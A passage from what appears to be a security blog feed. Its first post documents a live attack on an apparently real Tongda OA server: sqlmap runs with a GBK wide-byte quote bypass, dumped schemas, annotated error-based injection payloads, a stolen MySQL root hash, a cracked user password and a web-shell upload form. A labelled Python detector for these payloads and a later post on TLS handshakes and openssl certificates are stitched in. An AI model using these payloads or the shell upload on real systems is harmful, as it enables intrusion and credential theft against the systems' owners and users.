class="line">294</div><div class="line">295</div><div class="line">296</div><div class="line">297</div><div class="line">298</div><div class="line">299</div><div class="line">300</div><div class="line">301</div><div class="line">302</div><div class="line">303</div><div class="line">304</div><div class="line">305</div><div class="line">306</div><div class="line">307</div><div class="line">308</div><div class="line">309</div></pre></td><td class="code"><pre><div class="line">python sqlmap.py -u <span class="string">"http://211.137.*.*/logincheck.php"</span> --data=<span class="string">"PASSWORD=123456&UNAME=admin%bf'*%23"</span> --tables</div><div class="line"></div><div class="line">web server operating system: Windows</div><div class="line">web application technology: PHP 5.2.10, Apache 2.2.22</div><div class="line">back-end DBMS: MySQL 5.0</div><div class="line">Database: TRAIN</div><div class="line">[5 tables]</div><div class="line">+---------------------------------------+</div><div class="line">| kind |</div><div class="line">| pass |</div><div class="line">| price |</div><div class="line">| station |</div><div class="line">| train |</div><div class="line">+---------------------------------------+</div><div class="line"></div><div class="line">Database: TD_OA</div><div class="line">[204 tables]</div><div class="line">+---------------------------------------+</div><div class="line">| user |</div><div class="line"></div><div class="line">Table: user //login user data</div><div class="line">[77 columns]</div><div class="line">+------------------+------------------+</div><div class="line">| Column | Type |</div><div class="line">+------------------+------------------+</div><div class="line">| ADD_HOME | varchar(200) |</div><div class="line">| AUTHORIZE | int(11) |</div><div class="line">| AVATAR | varchar(20) |</div><div class="line">| BBS_COUNTER | int(11) |</div><div class="line">| BBS_SIGNATURE | text |</div><div class="line">| BIND_IP | text |</div><div class="line">| 
BIRTHDAY | date |</div><div class="line">| BKGROUND | text |</div><div class="line">| BP_NO | varchar(50) |</div><div class="line">| BYNAME | varchar(20) |</div><div class="line">| CALL_SOUND | char(2) |</div><div class="line">| CANBROADCAST | int(11) |</div><div class="line">| CONCERN_USER | text |</div><div class="line">| DEPT_ID | int(11) |</div><div class="line">| DEPT_ID_OTHER | text |</div><div class="line">| DISABLED | int(11) |</div><div class="line">| DUTY_TYPE | int(11) |</div><div class="line">| EMAIL | varchar(50) |</div><div class="line">| EMAIL_CAPACITY | int(11) |</div><div class="line">| FAX_NO_DEPT | varchar(50) |</div><div class="line">| FOLDER_CAPACITY | int(11) |</div><div class="line">| ICQ_NO | varchar(50) |</div><div class="line">| IS_LUNAR | char(1) |</div><div class="line">| KEY_SN | varchar(100) |</div><div class="line">| LAST_PASS_TIME | datetime |</div><div class="line">| LAST_VISIT_IP | varchar(100) |</div><div class="line">| LAST_VISIT_TIME | datetime |</div><div class="line">| LIMIT_LOGIN | char(1) |</div><div class="line">| MENU_EXPAND | char(2) |</div><div class="line">| MENU_IMAGE | varchar(20) |</div><div class="line">| MENU_TYPE | char(1) |</div><div class="line">| MOBIL_NO | varchar(50) |</div><div class="line">| MOBIL_NO_HIDDEN | char(1) |</div><div class="line">| MOBILE_PS1 | varchar(50) |</div><div class="line">| MOBILE_PS2 | varchar(50) |</div><div class="line">| MOBILE_SP | varchar(50) |</div><div class="line">| MSN | varchar(200) |</div><div class="line">| MY_RSS | text |</div><div class="line">| MY_STATUS | varchar(200) |</div><div class="line">| MYTABLE_LEFT | varchar(200) |</div><div class="line">| MYTABLE_RIGHT | varchar(200) |</div><div class="line">| NICK_NAME | varchar(50) |</div><div class="line">| NOT_LOGIN | varchar(20) |</div><div class="line">| NOT_VIEW_TABLE | varchar(20) |</div><div class="line">| NOT_VIEW_USER | varchar(20) |</div><div class="line">| OICQ_NO | varchar(50) |</div><div class="line">| ON_STATUS 
| char(1) |</div><div class="line">| ONLINE | int(11) |</div><div class="line">| PANEL | char(1) |</div><div class="line">| PASSWORD | varchar(50) |</div><div class="line">| PIC_ID | int(10) unsigned |</div><div class="line">| POST_DEPT | text |</div><div class="line">| POST_NO_HOME | varchar(50) |</div><div class="line">| POST_PRIV | varchar(50) |</div><div class="line">| REMARK | text |</div><div class="line">| SCORE | int(11) |</div><div class="line">| SECURE_KEY_SN | varchar(20) |</div><div class="line">| SEX | char(1) |</div><div class="line">| SHORTCUT | text |</div><div class="line">| SHOW_RSS | char(1) |</div><div class="line">| SMS_ON | char(1) |</div><div class="line">| TDER_FLAG | char(1) |</div><div class="line">| TEL_NO_DEPT | varchar(50) |</div><div class="line">| TEL_NO_HOME | varchar(50) |</div><div class="line">| THEME | varchar(10) |</div><div class="line">| UID | int(11) |</div><div class="line">| UIN | int(10) unsigned |</div><div class="line">| USEING_KEY | char(2) |</div><div class="line">| USER_DEFINE | text |</div><div class="line">| USER_ID | varchar(20) |</div><div class="line">| USER_NAME | varchar(200) |</div><div class="line">| USER_NO | int(11) |</div><div class="line">| USER_PRIV | varchar(10) |</div><div class="line">| USER_PRIV_OTHER | text |</div><div class="line">| WEATHER_CITY | varchar(20) |</div><div class="line">| WEBMAIL_CAPACITY | int(11) |</div><div class="line">| WEBMAIL_NUM | int(11) |</div><div class="line">+------------------+------------------+</div><div class="line"></div><div class="line"></div><div class="line">| version |</div><div class="line">| address |</div><div class="line">| address_group |</div><div class="line">| affair |</div><div class="line">| app_config |</div><div class="line">| app_log |</div><div class="line">| attachment_edit |</div><div class="line">| attend_config |</div><div class="line">| attend_duty |</div><div class="line">| attend_evection |</div><div class="line">| attend_holiday |</div><div 
class="line">| attend_leave |</div><div class="line">| attend_manager |</div><div class="line">| attend_out |</div><div class="line">| bbs_board |</div><div class="line">| bbs_comment |</div><div class="line">| book_info |</div><div class="line">| book_manage |</div><div class="line">| book_manager |</div><div class="line">| book_type |</div><div class="line">| bs_line |</div><div class="line">| calendar |</div><div class="line">| categories_type |</div><div class="line">| censor_data |</div><div class="line">| censor_module |</div><div class="line">| censor_words |</div><div class="line">| chatroom |</div><div class="line">| contact |</div><div class="line">| contract |</div><div class="line">| contract_line |</div><div class="line">| countdown |</div><div class="line">| cp_asset_type |</div><div class="line">| cp_assetcfg |</div><div class="line">| cp_cptl_info |</div><div class="line">| cp_dpct_sub |</div><div class="line">| cp_prcs_prop |</div><div class="line">| customer |</div><div class="line">| department |</div><div class="line">| dept_map |</div><div class="line">| diary |</div><div class="line">| diary_comment |</div><div class="line">| diary_comment_reply |</div><div class="line">| efax_account |</div><div class="line">| efax_receive_box |</div><div class="line">| efax_send_box |</div><div class="line">| email |</div><div class="line">| email_body |</div><div class="line">| email_box |</div><div class="line">| exam_data |</div><div class="line">| exam_flow |</div><div class="line">| exam_paper |</div><div class="line">| exam_quiz |</div><div class="line">| exam_quiz_set |</div><div class="line">| ext_user |</div><div class="line">| field_date |</div><div class="line">| fieldsetting |</div><div class="line">| file_content | //?</div><div class="line">| file_sort |</div><div class="line">| flow_form_type |</div><div class="line">| flow_print_tpl |</div><div class="line">| flow_process |</div><div class="line">| flow_query_tpl |</div><div class="line">| 
flow_rule |</div><div class="line">| flow_run |</div><div class="line">| flow_run_data |</div><div class="line">| flow_run_feedback |</div><div class="line">| flow_run_log |</div><div class="line">| flow_run_prcs |</div><div class="line">| flow_sort |</div><div class="line">| flow_timer |</div><div class="line">| flow_type |</div><div class="line">| hrms |</div><div class="line">| icqcontact_tb |</div><div class="line">| icqmsgs_tb |</div><div class="line">| icqservermsg_tb |</div><div class="line">| interface |</div><div class="line">| ip_rule |</div><div class="line">| linkman |</div><div class="line">| meeting |</div><div class="line">| meeting_equipment |</div><div class="line">| meeting_room |</div><div class="line">| module_priv |</div><div class="line">| mytable |</div><div class="line">| netchat |</div><div class="line">| netdisk |</div><div class="line">| netmeeting |</div><div class="line">| news |</div><div class="line">| news_comment |</div><div class="line">| notes |</div><div class="line">| notify |</div><div class="line">| oa_faxassign |</div><div class="line">| oa_faxbatch |</div><div class="line">| oa_faxconfig |</div><div class="line">| oa_faxfeecharge |</div><div class="line">| oa_faxfeeline |</div><div class="line">| oa_faxfeeprice |</div><div class="line">| oa_faxlog |</div><div class="line">| oa_faxremotehost |</div><div class="line">| oa_faxs |</div><div class="line">| oa_faxserverconfig |</div><div class="line">| oa_faxspecline |</div><div class="line">| oa_faxtemplates |</div><div class="line">| oa_options |</div><div class="line">| oa_source |</div><div class="line">| oa_source_used |</div><div class="line">| oa_stamps |</div><div class="line">| oc_log |</div><div class="line">| office_products |</div><div class="line">| office_task |</div><div class="line">| office_transhistory |</div><div class="line">| order_line |</div><div class="line">| picture |</div><div class="line">| plan_type |</div><div class="line">| product |</div><div 
class="line">| proj_bug |</div><div class="line">| proj_comment |</div><div class="line">| proj_cost |</div><div class="line">| proj_file |</div><div class="line">| proj_file_log |</div><div class="line">| proj_file_sort |</div><div class="line">| proj_forum |</div><div class="line">| proj_priv |</div><div class="line">| proj_project |</div><div class="line">| proj_task |</div><div class="line">| proj_task_log |</div><div class="line">| provider |</div><div class="line">| provider_linkman |</div><div class="line">| rms_file |</div><div class="line">| rms_lend |</div><div class="line">| rms_roll |</div><div class="line">| rms_roll_room |</div><div class="line">| rsa_keypair |</div><div class="line">| sal_data |</div><div class="line">| sal_flow |</div><div class="line">| sal_item |</div><div class="line">| sale_history |</div><div class="line">| sale_manager |</div><div class="line">| score_date |</div><div class="line">| score_flow |</div><div class="line">| score_group |</div><div class="line">| score_item |</div><div class="line">| seal |</div><div class="line">| seal_keylic |</div><div class="line">| seal_log |</div><div class="line">| secure_key |</div><div class="line">| service |</div><div class="line">| sms |</div><div class="line">| sms2 |</div><div class="line">| sms2_priv |</div><div class="line">| sms3 |</div><div class="line">| sms_body |</div><div class="line">| supply_history |</div><div class="line">| supply_order |</div><div class="line">| sys_code |</div><div class="line">| sys_function |</div><div class="line">| sys_log |</div><div class="line">| sys_menu |</div><div class="line">| sys_para |</div><div class="line">| task |</div><div class="line">| train_apply |</div><div class="line">| train_appoint_muster |</div><div class="line">| train_assess_data |</div><div class="line">| train_assess_item |</div><div class="line">| train_assess_title |</div><div class="line">| train_courses |</div><div class="line">| train_ctype |</div><div class="line">| 
train_info |</div><div class="line">| train_mail |</div><div class="line">| train_manager |</div><div class="line">| train_newcourse |</div><div class="line">| train_survey_data |</div><div class="line">| train_survey_item |</div><div class="line">| train_survey_title |</div><div class="line">| train_teachers |</div><div class="line">| train_ttype |</div><div class="line">| uni1 |</div><div class="line">| unit |</div><div class="line">| url |</div><div class="line">| user_group |</div><div class="line">| user_map |</div><div class="line">| user_online |</div><div class="line">| user_priv |</div><div class="line">| vehicle |</div><div class="line">| vehicle_maintenance |</div><div class="line">| vehicle_operator |</div><div class="line">| vehicle_usage |</div><div class="line">| versio1 |</div><div class="line">| vi_flow_run |</div><div class="line">| vi_user |</div><div class="line">| vote_data |</div><div class="line">| vote_item |</div><div class="line">| vote_title |</div><div class="line">| webmail |</div><div class="line">| wiki_ask |</div><div class="line">| wiki_ask_answer |</div><div class="line">| wiki_comment |</div><div class="line">| wiki_info |</div><div class="line">| winexe |</div><div class="line">| word_model |</div><div class="line">| work_detail |</div><div class="line">| work_person |</div><div class="line">| work_plan |</div><div class="line">| zl_file |</div><div class="line">+---------------------------------------+</div></pre></td></tr></table></figure>
<p>python sqlmap.py -u "<a href="http://211.137.*.*/logincheck.php" target="_blank" rel="external">http://211.137.*.*/logincheck.php</a>" --data="PASSWORD=123456&UNAME=admin%bf'*%23" -D TRAIN -T pass --columns</p>
<p>Determine the number of columns in the table<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">admin?' AND (<span class="keyword">SELECT</span> <span class="number">5821</span> <span class="keyword">FROM</span>(<span class="keyword">SELECT</span> <span class="keyword">COUNT</span>(*),<span class="keyword">CONCAT</span>(<span class="number">0x7171717071</span>,(<span class="keyword">SELECT</span> <span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">COUNT</span>(*) <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.COLUMNS <span class="keyword">WHERE</span> table_name=<span class="number">0x70617373</span> <span class="keyword">AND</span> table_schema=<span class="number">0x545241494e</span>),<span class="number">0x717a767071</span>,<span class="keyword">FLOOR</span>(<span class="keyword">RAND</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">FROM</span> INFORMATION_SCHEMA.CHARACTER_SETS <span class="keyword">GROUP</span> <span class="keyword">BY</span> x)a)#</div></pre></td></tr></table></figure></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">admin?' AND (<span class="keyword">SELECT</span> <span class="number">5821</span> <span class="keyword">FROM</span>(</div><div class="line"><span class="keyword">SELECT</span> <span class="keyword">COUNT</span>(*),<span class="keyword">CONCAT</span>(<span class="string">'qqqpq'</span>,<span class="comment">/*when CONCAT joins strings, the result is NULL as soon as any one argument is NULL*/</span></div><div class="line">(<span class="keyword">SELECT</span> <span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">COUNT</span>(*) <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.COLUMNS <span class="keyword">WHERE</span> table_name=<span class="string">'pass'</span> <span class="keyword">AND</span> table_schema=<span class="string">'TRAIN'</span>), <span class="comment">/*get the column count; if there is none, NULL is returned*/</span></div><div class="line"><span class="string">'qzvpq'</span>,<span class="keyword">FLOOR</span>(<span class="keyword">RAND</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="comment">/*FLOOR returns only the integer part; the fractional part is discarded*/</span></div><div class="line"><span class="keyword">FROM</span> INFORMATION_SCHEMA.CHARACTER_SETS <span class="keyword">GROUP</span> <span class="keyword">BY</span> x) <span class="keyword">as</span> a<span class="comment">/*this means every derived table (a) must have an alias of its own*/</span>)#</div><div class="line"><span class="comment">/*</span></div><div class="line"><span class="comment">MySQL's CAST() and CONVERT() functions take a value of one type and produce a value of another type. Their syntax is:</span></div><div class="line"><span class="comment"> CAST(value as type);</span></div><div class="line"><span class="comment"> CONVERT(value, type);</span></div><div class="line"><span class="comment">That is, CAST(xxx AS type) and CONVERT(xxx, type).</span></div><div class="line"><span class="comment">*/</span></div></pre></td></tr></table></figure>
<p>Dump the column names<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">admin?' AND (<span class="keyword">SELECT</span> <span class="number">4909</span> <span class="keyword">FROM</span>(<span class="keyword">SELECT</span> <span class="keyword">COUNT</span>(*),</div><div class="line"><span class="keyword">CONCAT</span>(<span class="number">0x7171717071</span>,</div><div class="line">(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(column_name <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.COLUMNS <span class="keyword">WHERE</span> table_name=<span class="number">0x70617373</span> <span class="keyword">AND</span> table_schema=<span class="number">0x545241494e</span> <span class="keyword">LIMIT</span> <span class="number">0</span>,<span class="number">1</span>),<span class="comment">/*column_name returns more than one row, so LIMIT restricts it to one*/</span></div><div class="line"><span class="number">0x717a767071</span>,<span class="keyword">FLOOR</span>(<span class="keyword">RAND</span>(<span class="number">0</span>)*<span class="number">2</span>))x </div><div class="line"><span class="keyword">FROM</span> INFORMATION_SCHEMA.CHARACTER_SETS <span class="keyword">GROUP</span> <span class="keyword">BY</span> x)a)#</div><div class="line"><span class="comment">/*The SQL MID() function returns part of a string. MySQL supports it, but MS SQL Server and Oracle do not; in SQL Server and Oracle use SUBSTRING or SUBSTR instead.*/</span></div><div class="line"><span class="keyword">SELECT</span> <span class="keyword">MID</span>(ColumnName, <span class="keyword">Start</span> [, <span class="keyword">Length</span>])</div><div class="line"><span class="keyword">FROM</span> TableName</div></pre></td></tr></table></figure></p>
<p>--password: the current user's password<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">admin?' AND (<span class="keyword">SELECT</span> <span class="number">7241</span> <span class="keyword">FROM</span>(<span class="keyword">SELECT</span> <span class="keyword">COUNT</span>(*),<span class="keyword">CONCAT</span>(<span class="number">0x7171717071</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">password</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> mysql.user <span class="keyword">LIMIT</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x717a767071</span>,<span class="keyword">FLOOR</span>(<span class="keyword">RAND</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">FROM</span> INFORMATION_SCHEMA.CHARACTER_SETS <span class="keyword">GROUP</span> <span class="keyword">BY</span> x)a)#</div></pre></td></tr></table></figure></p>
<p>current user: 'root@127.0.0.1'<br>*91AF99F23C3D4ED85140D100433725DFA52BECEE</p>
<p>User password obtained through the injection<br>张* $1$772.CR0.$dlecp6h5kiOsrVX6Id2BY1 ==> md5(unix) 594188</p>
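<p>Added example (not code from the original post): a small Python scanner, written from the defender's side, that flags the signatures of the error-based double query shown above (FLOOR(RAND(0)*2) grouped inside an aliased derived table, INFORMATION_SCHEMA reads) and the GBK wide-byte quote prefix admin%bf' in captured login request bodies. The request records it scans are constructed for this example.</p>

```python
import re
from urllib.parse import unquote_to_bytes

# Added example, not code from the original post. Signatures for the
# error-based double-query technique and the wide-byte quote bypass; each
# pattern is applied to the percent-decoded request body.
SIGNATURES = [
    # FLOOR(RAND(0)*2) used as a GROUP BY key is the duplicate-entry trick
    ("double_query_floor_rand", re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    # ... GROUP BY x)a)  or  ... GROUP BY x) as a)
    ("group_by_derived_table", re.compile(r"group\s+by\s+\w+\s*\)\s*(as\s+)?\w+\s*\)", re.I)),
    ("information_schema_read", re.compile(r"information_schema\.\w+", re.I)),
    ("mysql_user_read", re.compile(r"\bmysql\.user\b", re.I)),
    # a GBK lead byte (0x81-0xFE) directly before a quote: the wide-byte bypass
    ("wide_byte_quote", re.compile(r"[\x81-\xfe]'")),
]


def decode_body(raw: str) -> str:
    """Percent-decode to bytes first so %bf survives as a single byte, then map
    bytes 1:1 onto characters (latin-1) so the regexes can see them."""
    return unquote_to_bytes(raw.replace("+", " ")).decode("latin-1")


def scan_body(raw_body: str) -> list:
    """Return the names of every signature that matches the decoded body."""
    body = decode_body(raw_body)
    return [name for name, pattern in SIGNATURES if pattern.search(body)]


def scan_records(records):
    """records: iterable of (client, path, raw_body); yields only the hits."""
    for client, path, raw_body in records:
        hits = scan_body(raw_body)
        if hits:
            yield client, path, hits


# Constructed records: a normal login, a wide-byte probe, a column-count query
CONSTRUCTED_REQUESTS = [
    ("10.0.0.7", "/logincheck.php", "PASSWORD=123456&UNAME=admin"),
    ("10.0.0.9", "/logincheck.php", "PASSWORD=123456&UNAME=admin%bf%27*%23"),
    ("10.0.0.9", "/logincheck.php",
     "PASSWORD=123456&UNAME=admin%bf%27+AND+(SELECT+5821+FROM(SELECT+COUNT(*),"
     "CONCAT(0x7171717071,(SELECT+IFNULL(CAST(COUNT(*)+AS+CHAR),0x20)+FROM+"
     "INFORMATION_SCHEMA.COLUMNS+WHERE+table_name%3D0x70617373),0x717a767071,"
     "FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)%23"),
]

if __name__ == "__main__":
    for client, path, hits in scan_records(CONSTRUCTED_REQUESTS):
        print(f"{client} {path}: {', '.join(hits)}")
```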
<h4 id="GETSHELL"><a href="#GETSHELL" class="headerlink" title="GETSHELL"></a>GETSHELL</h4><p>Tongda OA back-end getshell<br><a href="http://www.doc88.com/p-1334628630199.html" target="_blank" rel="external">http://www.doc88.com/p-1334628630199.html</a></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">form</span> <span class="attr">id</span>=<span class="string">"frmUpload"</span> <span class="attr">enctype</span>=<span class="string">"multipart/form-data"</span></span></div><div class="line"><span class="tag"><span class="attr">action</span>=<span class="string">"http://211.137.*.*/general/vmeet/privateUpload.php?fileName=555.php+"</span> <span class="attr">method</span>=<span class="string">"post"</span>></span></div><div class="line">Upload a new file:<span class="tag"><<span class="name">br</span>></span></div><div class="line"><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"file"</span> <span class="attr">name</span>=<span class="string">"Filedata"</span> <span class="attr">size</span>=<span class="string">"50"</span>></span><span class="tag"><<span class="name">br</span>></span></div><div class="line"><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">value</span>=<span class="string">"Upload"</span>></span></div><div class="line"><span class="comment"><!-- http://192.168.56.139/general/vmeet/upload/temp/555.php.111 this is where the uploaded web shell ends up --></span></div><div class="line"><span class="tag"></<span class="name">form</span>></span></div></pre></td></tr></table></figure>
]]></content>
</entry>
<entry>
<title><![CDATA[SSL Protocol]]></title>
<url>/2015/04/08/SSL/</url>
<content type="html"><![CDATA[<p>Terminology:<br>SSL (Secure Socket Layer), the Secure Socket Layer protocol<br>TLS (Transport Layer Security), the Transport Layer Security protocol</p>
<h3 id="TLS协议"><a href="#TLS协议" class="headerlink" title="TLS协议"></a>TLS Protocol</h3><p><img src="https://blog.cloudflare.com/content/images/2014/Sep/keyless-comic-v1.gif" alt=""></p>
<p>Step 1: Alice sends the protocol version, a client-generated random number (Client random), and the encryption methods the client supports.<br>Step 2: Bob confirms the encryption method both sides will use and sends his digital certificate together with a server-generated random number (Server random).<br>Step 3: Alice verifies that the certificate is valid, generates a new random number (Premaster secret), encrypts it with the public key from the certificate, and sends it to Bob.<br>Step 4: Bob uses his own private key to recover the random number Alice sent (the Premaster secret).<br>Step 5: Alice and Bob use the agreed encryption method and the three random numbers to generate the "session key", which encrypts the whole conversation that follows.</p>
<p><img src="https://blog.cloudflare.com/content/images/2014/Sep/ssl_handshake_rsa.jpg" alt=""></p>
<p>Tip:<br>1. Three random numbers are needed to generate the session key; the third one is sent encrypted with the server's public key, so nobody but the client and the server (which can decrypt it) knows it.<br>2. After the handshake the conversation is encrypted with the session key (symmetric encryption); the server's public and private keys are used only to encrypt and decrypt the premaster secret (asymmetric encryption) and for nothing else.<br>3. The server's public key is carried in the server's digital certificate.</p>
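<p>As an added example (not code from the original post), the following Python implements the TLS 1.2 PRF from RFC 5246 and derives the session keys from exactly the three values named above: client random, server random and premaster secret. The randoms are constructed locally, and the key sizes default to the AES128-GCM-SHA256 suite that appears in the curl output on this page.</p>

```python
import hashlib
import hmac
import os

# Added example, not code from the original post: the TLS 1.2 PRF (RFC 5246,
# section 5) applied to the three handshake randoms. Nothing here touches the
# network; the handshake values are constructed locally.


def p_sha256(secret: bytes, seed: bytes, length: int) -> bytes:
    """P_SHA256 expansion: A(0) = seed, A(i) = HMAC(secret, A(i-1)),
    output = HMAC(secret, A(1) + seed) || HMAC(secret, A(2) + seed) || ..."""
    out, a = b"", seed
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()
    return out[:length]


def prf(secret: bytes, label: bytes, seed: bytes, length: int) -> bytes:
    """PRF(secret, label, seed) = P_SHA256(secret, label + seed)."""
    return p_sha256(secret, label + seed, length)


def master_secret(premaster: bytes, client_random: bytes, server_random: bytes) -> bytes:
    """RFC 5246 s8.1: 48-byte master secret from the premaster and both randoms."""
    return prf(premaster, b"master secret", client_random + server_random, 48)


def session_keys(premaster: bytes, client_random: bytes, server_random: bytes,
                 mac_len: int = 0, key_len: int = 16, iv_len: int = 4) -> dict:
    """RFC 5246 s6.3 key expansion. Defaults match AES128-GCM-SHA256: no MAC
    key, 16-byte AES keys, 4-byte fixed IVs. Note that the seed order flips
    to server_random + client_random for this step."""
    master = master_secret(premaster, client_random, server_random)
    block = prf(master, b"key expansion", server_random + client_random,
                2 * (mac_len + key_len + iv_len))
    names = ["client_write_mac", "server_write_mac", "client_write_key",
             "server_write_key", "client_write_iv", "server_write_iv"]
    sizes = [mac_len, mac_len, key_len, key_len, iv_len, iv_len]
    keys, pos = {}, 0
    for name, size in zip(names, sizes):
        keys[name] = block[pos:pos + size]
        pos += size
    keys["master_secret"] = master
    return keys


if __name__ == "__main__":
    # Constructed handshake values. With RSA key exchange the premaster is the
    # 2-byte client version followed by 46 random bytes, sent encrypted under
    # the public key from the server certificate.
    client_random = os.urandom(32)
    server_random = os.urandom(32)
    premaster = b"\x03\x03" + os.urandom(46)
    for name, value in session_keys(premaster, client_random, server_random).items():
        print(f"{name:18} {value.hex()}")
```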
<p>Diffie-Hellman</p>
<p><img src="https://blog.cloudflare.com/content/images/2014/Sep/ssl_handshake_diffie_hellman.jpg" alt=""></p>
<p>curl -k <a href="https://www.baidu.com/img/baidu_jgylogo3.gif" target="_blank" rel="external">https://www.baidu.com/img/baidu_jgylogo3.gif</a></p>
<p>Wireshark</p>
<p>192.168.1.5 180.97.33.107 SSL Client Hello<br>180.97.33.107 192.168.1.5 TLSv1.2 Server Hello<br>180.97.33.107 192.168.1.5 TLSv1.2 Certificate, Server Key Exchange (server DH parameters), Server Hello Done<br>192.168.1.5 180.97.33.107 TLSv1.2 Client Key Exchange (client DH parameters), Change Cipher Spec, Encrypted Handshake Message<br>180.97.33.107 192.168.1.5 TLSv1.2 Change Cipher Spec, Encrypted Handshake Message</p>
<p>curl -v shows the handshake exchange</p>
<p>* TLSv1.2 (OUT), TLS handshake, Client hello (1):<br>* TLSv1.2 (IN), TLS handshake, Server hello (2):<br>* NPN, negotiated HTTP1.1<br>* TLSv1.2 (IN), TLS handshake, Certificate (11):<br>* TLSv1.2 (IN), TLS handshake, Server key exchange (12):<br>* TLSv1.2 (IN), TLS handshake, Server finished (14):<br>* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):<br>* TLSv1.2 (OUT), TLS change cipher, Client hello (1):<br>* TLSv1.2 (OUT), TLS handshake, Unknown (67):<br>* TLSv1.2 (OUT), TLS handshake, Finished (20):<br>* TLSv1.2 (IN), TLS change cipher, Client hello (1):<br>* TLSv1.2 (IN), TLS handshake, Finished (20):<br>* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256</p>
<a id="more"></a>
<h3 id="证书生成"><a href="#证书生成" class="headerlink" title="证书生成"></a>Certificate Generation</h3><p>openssl options explained</p>
<p>-new: create a certificate request file<br>-config<br>-extfile<br>-subj</p>
<p>1. Self-signed certificate</p>
<p>Generate the private key<br><code>openssl genrsa -des3 -out server.key 4096</code></p>
<p>Remove the passphrase from the key<br><code>openssl rsa -in server.key -out nokey_server.key</code></p>
<p>Generate the CSR<br><code>openssl req -new -key server.key -out server.csr -config openssl.cfg -subj "/C=CN/ST=SC/L=CD/O=CerTest/OU=CerTest/CN=www.mytest.com"</code></p>
<p>CN = baidu.com (Common Name)<br>O = BeiJing Baidu Netcom Science Technology Co., Ltd (Organization)<br>OU = service operation department. (Organizational Unit, the department)<br>L = beijing (Locality, the city)<br>ST = beijing (State or province)<br>C = CN (Country or region)</p>
<p>Generate the self-signed certificate<br><code>openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt</code></p>
<blockquote>
<p>openssl generates a private key and, from that key, a certificate request (CSR). A trusted certificate authority takes the request file and issues you a cer certificate. A self-built CA can also sign certificates for its own requests, which of course are not trusted by default; once the CA certificate has been imported into the local computer's "Trusted Root Certification Authorities" store, certificates it issued are treated as trusted.</p>
</blockquote>
<p>2. Certificates issued by a self-built CA</p>
<p>Step 1: Generate the root CA</p>
<p>a) Generate the private key ca.key<br><code>openssl genrsa -aes256 -passout pass:123456 -out ca.key 4096</code></p>
<p>b) Generate the certificate signing request ca.csr<br><code>openssl req -new -key ca.key -out ca.csr -subj "/C=CN/ST=SC/O=CerTest/OU=Test Certificate Authority/CN=Test Root CA"</code></p>
<blockquote>
<p>The openssl ca pseudo-command automatically looks for the openssl.cfg configuration file named in the environment variable.</p>
</blockquote>
<p>c) Self-sign the root certificate with the CA private key<br><code>openssl x509 -req -days 3650 -sha256 -signkey ca.key -in ca.csr -extfile ca.cnf -extensions v3_ca -out ca.cer</code></p>
<p>ca.cnf configuration file<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">[ v3_ca ]</div><div class="line"># Extensions for a typical CA</div><div class="line">subjectKeyIdentifier=hash</div><div class="line">authorityKeyIdentifier=keyid:always,issuer</div><div class="line">basicConstraints = CA:true</div><div class="line">keyUsage = cRLSign, keyCertSign</div></pre></td></tr></table></figure></p>
<p>Step 2: Generate the intermediate certificate</p>
<p>a) Generate the private key inter.key<br><code>openssl genrsa -aes256 -passout pass:123456 -out inter.key 4096</code></p>
<p>b) Generate the intermediate certificate request inter.csr<br><code>openssl req -new -key inter.key -out inter.csr -subj "/C=CN/ST=SC/O=CerTest/OU=Test Certificate Authority/CN=Test Intermedia CA"</code></p>
